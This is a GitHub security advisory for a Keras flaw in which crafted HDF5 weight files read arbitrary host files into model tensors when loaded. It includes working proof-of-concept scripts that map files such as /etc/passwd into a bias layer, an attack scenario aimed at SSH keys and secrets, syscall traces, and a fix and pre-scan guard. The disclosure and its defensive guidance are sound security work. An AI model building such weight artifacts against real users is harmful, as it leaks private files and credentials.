GHSA-3M4Q-JMJ6-R34Q

Vulnerability from github – Published: 2026-02-18 22:41 – Updated: 2026-02-18 22:41
Summary
Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading
Details

Summary

TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).
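The external-storage mechanism can be demonstrated with h5py alone, independent of Keras. The sketch below is illustrative only: the file names and the stand-in "secret" file are hypothetical, and a real attack would point the `external=` mapping at an existing host file instead.

```python
import os
import tempfile

import h5py
import numpy as np

# Stand-in for a sensitive host file.
secret = tempfile.NamedTemporaryFile(delete=False)
secret.write(b"S3CR3T_API_KEY=abcd1234")
secret.close()

with h5py.File("demo.h5", "w") as f:
    # The dataset's storage lives *outside* demo.h5: the first 20 bytes
    # (five float32 values) are mapped directly from the secret file.
    f.create_dataset(
        "weights", shape=(5,), dtype="float32",
        external=[(secret.name, 0, 20)],
    )

with h5py.File("demo.h5", "r") as f:
    # An ordinary dataset read transparently pulls bytes from the
    # external file -- no special API call is needed on the reader side.
    leaked = np.asarray(f["weights"]).view(np.uint8).tobytes()

print(leaked)  # first 20 bytes of the stand-in secret

os.unlink(secret.name)
os.unlink("demo.h5")
```

Any loader that reads such a dataset into tensors (as `load_weights()` does) inherits this behaviour.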

Impact

  • Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
  • What leaks: Contents of any readable file on the host (e.g., /etc/hosts, /etc/passwd, /etc/hostname).
  • Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
  • Prerequisites: Victim executes model.load_weights() or tf.keras.models.load_model() on an attacker-supplied HDF5 weights file or .keras archive.
  • Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.

Attacker Scenario

  1. Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
  2. Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., /home/<user>/.ssh/id_rsa, /etc/shadow if readable, configuration files containing API keys, etc.).
  3. Execution: The victim calls model.load_weights() (or tf.keras.models.load_model() for .keras archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.
  4. Exfiltration vectors:
     • Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
     • Re-saving the model (weights or .keras archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.
     • If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.

Additional Preconditions

  • The target file must exist and be readable by the process running TensorFlow/Keras.
  • Safe mode (load_model(..., safe_mode=True)) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.
  • Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to /etc/hostname) can reduce impact, but common defaults expose a broad set of host files.

Environment Used for Verification (2025‑10‑19)

  • OS: Debian-based container running Python 3.11.
  • Packages (installed via python -m pip install -U ...):
    • tensorflow==2.20.0
    • keras==3.11.3
    • h5py==3.15.1
    • numpy==2.3.4
  • Tooling: strace (for syscall tracing), pip upgraded to latest before installs.
  • Debug flags: PYTHONFAULTHANDLER=1, TF_CPP_MIN_LOG_LEVEL=0 during instrumentation to capture verbose logs if needed.

Reproduction Instructions (Weights-Only PoC)

  1. Ensure the environment above (or equivalent) is prepared.
  2. Save the following script as weights_external_demo.py:
from __future__ import annotations
import os
from pathlib import Path
import numpy as np
import tensorflow as tf
import h5py

def choose_host_file() -> Path:
    candidates = [
        os.environ.get("KFLI_PATH"),
        "/etc/machine-id",
        "/etc/hostname",
        "/proc/sys/kernel/hostname",
        "/etc/passwd",
    ]
    for candidate in candidates:
        if not candidate:
            continue
        path = Path(candidate)
        if path.exists() and path.is_file():
            return path
    raise FileNotFoundError("set KFLI_PATH to a readable file")

def build_model(units: int) -> tf.keras.Model:
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(1,), name="input"),
        tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"),
    ])
    model(tf.zeros((1, 1)))  # build weights
    return model

def find_bias_dataset(h5file: h5py.File) -> str:
    matches: list[str] = []
    def visit(name: str, obj) -> None:
        if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"):
            matches.append(name)
    h5file.visititems(visit)
    if not matches:
        raise RuntimeError("bias dataset not found")
    return matches[0]

def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:
    with h5py.File(path, "r+") as h5file:
        bias_path = find_bias_dataset(h5file)
        parent = h5file[str(Path(bias_path).parent)]
        dset_name = Path(bias_path).name
        del parent[dset_name]
        max_bytes = 128
        size = host_file.stat().st_size
        nbytes = min(size, max_bytes)
        nbytes = (nbytes // 4) * 4 or 32  # multiple of 4 for float32 packing
        units = max(1, nbytes // 4)
        parent.create_dataset(
            dset_name,
            shape=(units,),
            dtype="float32",
            external=[(host_file.as_posix(), 0, nbytes)],
        )
        return units, nbytes

def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:
    raw = np.ascontiguousarray(arr).view(np.uint8)
    ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore")
    hex_preview = raw[:64].tobytes().hex()
    return ascii_preview, hex_preview

def main() -> None:
    host_file = choose_host_file()
    model = build_model(units=32)

    weights_path = Path("weights_demo.h5")
    model.save_weights(weights_path.as_posix())

    units, nbytes = rewrite_bias_external(weights_path, host_file)
    print("secret_text_source", host_file)
    print("units", units, "bytes_mapped", nbytes)

    model.load_weights(weights_path.as_posix())
    output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
    ascii_preview, hex_preview = floats_to_ascii(output)
    print("recovered_ascii", ascii_preview)
    print("recovered_hex64", hex_preview)

    saved = Path("weights_demo_resaved.h5")
    model.save_weights(saved.as_posix())
    print("resaved_weights", saved.as_posix())

if __name__ == "__main__":
    main()
  3. Execute python weights_external_demo.py.
  4. Observe:
     • secret_text_source prints the chosen host file path.
     • recovered_ascii/recovered_hex64 display the file contents recovered via model inference.
     • A re-saved weights file contains the leaked bytes inside the artifact.

Expanded Validation (Multiple Attack Scenarios)

The following test harness generalises the attack for multiple HDF5 constructs:

  • Build a minimal feed-forward model and baseline weights.
  • Create three malicious variants:
    1. External storage dataset: dataset references /etc/hosts.
    2. External link: ExternalLink pointing at /etc/passwd.
    3. Indirect link: external storage referencing a helper HDF5 that, in turn, refers to /etc/hostname.
  • Run each scenario under strace -f -e trace=open,openat,read while calling model.load_weights(...).
  • Post-process traces and weight tensors to show the exact bytes loaded.
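The indirect (third) variant can be sketched with h5py as follows. This is a hedged sketch, not the harness itself: the file names are hypothetical, and a temporary file stands in for the targeted host file.

```python
import os
import tempfile

import h5py
import numpy as np

# Stand-in for the target host file (e.g., /etc/hostname in the harness).
target = tempfile.NamedTemporaryFile(delete=False)
target.write(b"host-secret-bytes!!!")  # 20 bytes
target.close()

# Helper HDF5: its dataset's storage maps bytes from the target file.
with h5py.File("helper.h5", "w") as helper:
    helper.create_dataset(
        "payload", shape=(5,), dtype="float32",
        external=[(target.name, 0, 20)],
    )

# Main weights file: contains no secret data, only a link to the helper.
with h5py.File("main.h5", "w") as main:
    grp = main.create_group("dense")
    grp["bias"] = h5py.ExternalLink("helper.h5", "/payload")

# A loader traversing "dense/bias" follows the link, then the external
# storage, and ends up reading the target file.
with h5py.File("main.h5", "r") as main:
    leaked = np.asarray(main["dense/bias"]).view(np.uint8).tobytes()

os.unlink(target.name)
os.unlink("helper.h5")
os.unlink("main.h5")
```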

Relevant syscall excerpts captured during the run:

openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13

The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.

Recommended Product Fix

  1. Default-deny external datasets/links:
     • Inspect creation property lists (get_external_count) before materialising tensors.
     • Resolve SoftLink / ExternalLink targets and block if they leave the HDF5 file.
  2. Provide an escape hatch:
     • Offer an explicit allow_external_data=True flag or environment variable for advanced users who truly rely on HDF5 external storage.
  3. Documentation:
     • Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
  4. Regression coverage:
     • Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.

Workarounds

  • Avoid loading untrusted HDF5 weight files.
  • Pre-scan weight files using h5py to detect external datasets or links before invoking Keras loaders.
  • Prefer alternate formats (e.g., NumPy .npz) that lack external reference capabilities when exchanging weights.
  • If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.
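The pre-scan workaround can be sketched with h5py's own API. This is a sketch under the assumption that rejecting every soft/external link and every externally stored dataset is acceptable for your artifacts; the function name is our own, not a Keras API.

```python
import h5py

def scan_for_external_refs(path: str) -> list[str]:
    """Report external links/storage in an HDF5 file without dereferencing them."""
    findings: list[str] = []

    def walk(group: h5py.Group, prefix: str) -> None:
        for name in group:
            full = f"{prefix}/{name}"
            # Inspect the link object itself; getlink=True avoids resolving it.
            link = group.get(name, getlink=True)
            if isinstance(link, (h5py.ExternalLink, h5py.SoftLink)):
                findings.append(f"suspicious link: {full}")
                continue  # never follow it
            obj = group.get(name)
            if isinstance(obj, h5py.Dataset):
                # The dataset creation property list records external
                # storage segments attached to the dataset.
                if obj.id.get_create_plist().get_external_count() > 0:
                    findings.append(f"external storage: {full}")
            elif isinstance(obj, h5py.Group):
                walk(obj, full)

    with h5py.File(path, "r") as f:
        walk(f, "")
    return findings
```

A loading wrapper could refuse to call model.load_weights() whenever this scan returns any findings.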

Timeline (UTC)

  • 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
  • 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented safe_keras_hdf5.py prototype guard.

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.13.0"
            },
            {
              "fixed": "3.13.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.12.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1669"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-18T22:41:58Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "id": "GHSA-3m4q-jmj6-r34q",
  "modified": "2026-02-18T22:41:58Z",
  "published": "2026-02-18T22:41:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/22057"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/releases/tag/v3.12.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/releases/tag/v3.13.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading"
}

